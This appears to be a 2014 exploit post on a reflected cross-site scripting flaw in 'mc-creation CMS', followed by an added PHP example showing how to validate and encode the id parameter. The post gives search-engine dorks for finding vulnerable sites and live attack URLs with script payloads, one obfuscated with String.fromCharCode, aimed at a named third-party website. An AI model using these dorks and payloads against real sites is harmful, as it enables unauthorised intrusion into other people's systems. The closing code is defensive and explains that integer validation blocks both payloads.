Thursday, 3 July 2014

mc-creation CMS - XSS Vulnerability

Dorks:
intext:"web design solution" inurl:"product_view.php?pid="
intext:"web design solution"

Exploit:
"product_view.php?pid="

Examples & Live Demos:

Testing:
http://www.toupretpro.co.uk/products/product_view.php?pid=10%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E

String.fromCharCode variant:
http://www.toupretpro.co.uk/products/product_view.php?pid=10%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E
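
Fixing the reflected pid value, as an added example that is not part of the original post and is not mc-creation CMS code (the page does not show the CMS source). It assumes pid is echoed into a double-quoted HTML attribute, as the `">` prefix in the test value suggests; the function names are hypothetical.

```php
<?php
// Added illustration, NOT mc-creation CMS source.
// Assumption: pid is written into a double-quoted HTML attribute.

// Vulnerable pattern (assumed): raw request value concatenated into markup.
function render_link_vulnerable(string $pid): string
{
    return '<a href="product_view.php?pid=' . $pid . '">View product</a>';
}

// Validation: a product id is a positive integer and nothing else.
function parse_pid(string $raw): ?int
{
    $pid = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $pid === false ? null : $pid;
}

// Hardened: validate first, then encode for the context the value lands in
// (URL component, then HTML attribute). The caller should answer with HTTP 400
// when the id is rejected.
function render_link_hardened(string $raw): string
{
    $pid = parse_pid($raw);
    if ($pid === null) {
        return '<p>Invalid product id.</p>';
    }
    $href = 'product_view.php?pid=' . rawurlencode((string) $pid);
    return '<a href="'
        . htmlspecialchars($href, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
        . '">View product</a>';
}

// Constructed sample input: a normal id and the URL-decoded form of the
// first test value shown on this page.
$samples = ['10', '10"><script>alert(1337);</script>'];

foreach ($samples as $raw) {
    echo 'input:      ', $raw, PHP_EOL;
    echo 'vulnerable: ', render_link_vulnerable($raw), PHP_EOL;
    echo 'hardened:   ', render_link_hardened($raw), PHP_EOL, PHP_EOL;
}
```

The String.fromCharCode variant fails the same integer check, because validation rejects everything that is not a number instead of trying to recognise script syntax.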



NEXUS